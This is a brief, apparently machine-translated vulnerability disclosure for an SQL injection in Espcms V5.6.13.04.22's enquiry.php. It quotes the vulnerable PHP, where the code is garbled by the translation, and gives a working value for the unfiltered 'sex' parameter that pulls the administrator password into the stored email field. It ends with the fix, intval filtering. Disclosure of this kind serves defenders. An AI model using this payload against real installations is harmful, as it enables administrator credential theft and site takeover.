Espcms V5.6.13.04.22 UTF8 official version injection vulnerability 4/N

Espcms V5.6.13.04.22 an injection vulnerability exists in an official UTF8 file, allowing you to obtain the Administrator account and password.
 
In the file \ interface \ enquiry. php:

Function in_enquirysave () {parent: start_pagetemplate (); $ this-> fun-> formpathver (); $ lng = (admin_LNG = 'big5 ')? $ This-> CON ['is _ lancode']: admin_LNG; if ($ this-> CON ['is _ enquiry_memclass ']) {parent: member_purview (0, $ this-> get_link ('enabley', array (), admin_LNG ));} $ cartid = $ this-> fun-> eccode ($ this-> fun-> accept ('ecisp _ enquiry_list ', 'C'), 'decode', db_pscode ); $ cartid = stripslashes (htmlspecialchars_decode ($ cartid); $ uncartid =! Empty ($ cartid )? Unserialize ($ cartid): 0; $ userid = intval ($ this-> fun-> accept ('userid', 'P'); $ userid =! Empty ($ userid )? $ Userid: 0; $ linkman = trim ($ this-> fun-> accept ('linkman ', 'P', true, true )); $ email = $ this-> fun-> accept ('email ', 'P'); $ sex = $ this-> fun-> accept ('sex ', 'P'); $ sex = empty ($ sex )? 0: $ sex; $ the sex variable does not use intval to filter. The SQL statement that follows it is not enclosed in single quotes. $ db_field = 'enquirysn, userid, linkman, sex, country, province, city, district, address, zipcode, tel, fax, mobile, email, content, isclass, addtime, edittime'; $ db_values = "'$ enquirysn', $ userid, '$ linkman', $ sex, $ country, $ province, $ city, $ district, '$ address',' $ zipcode ',' $ tel ',' $ fax ', '$ mobile',' $ email ',' $ content', 0, $ addtime, 0 "; $ this-> db-> query ('insert '. $ db_table. '('. $ db_field. ') VALUES ('. $ db_values. ')');

Modify the sex value as follows:

Sex =, (select password from espcms_admin_member limit 1), 1368528987,0) % 23


Insert the administrator password to the email address:

Solution:
Intval Filtering